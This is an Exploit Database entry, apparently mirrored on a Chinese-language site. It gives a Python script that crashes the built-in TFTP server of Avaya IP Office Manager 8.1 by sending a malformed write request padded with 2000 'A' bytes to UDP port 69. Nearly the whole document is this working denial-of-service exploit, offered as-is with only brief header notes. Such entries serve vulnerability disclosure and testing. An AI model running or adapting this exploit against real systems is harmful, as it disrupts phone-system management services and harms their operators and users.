Avaya IP Office Manager 8.1 TFTP – Denial of Service

• Exploit Database
• 13 阅读

• 作者： Craig Freyman
  日期： 2011-03-24
• 类别：

  • dos
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/17045/

• #Exploit Title: Avaya IP Office Manager TFTP DOS
  #Version: Avaya IP Office Manager 8.1 (5)
  #Author: Craig Freyman (cd1zz)
  #Date: March 23, 2011
  #Description: Avaya IP Office Manager is the management console for Avaya IP Office phone systems. 
  #There is a built in TFTP server that is used to update the firmware on phones. The TFTP service 
  #is loaded when the admin console is opened. I was not able to overwrite any registers or the SEH.
  #Software Link: ftp://ftp.avaya.com/incoming/Up1cku9/SoftwarePub/6_1GA_Builds/ADMIN6_1_5.exe
  #Tested on: Windows XP SP3
  
  #!/usr/bin/python
  import socket
  
  host = '192.168.133.131'
  port = 69
  
  s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
  
  crash = "A" * 2000
  
  print "Sending crash...."
  pwned = "\x00\x02" + "A" + "\x00" + crash + "\x00"
  s.sendto(pwned, (host, port))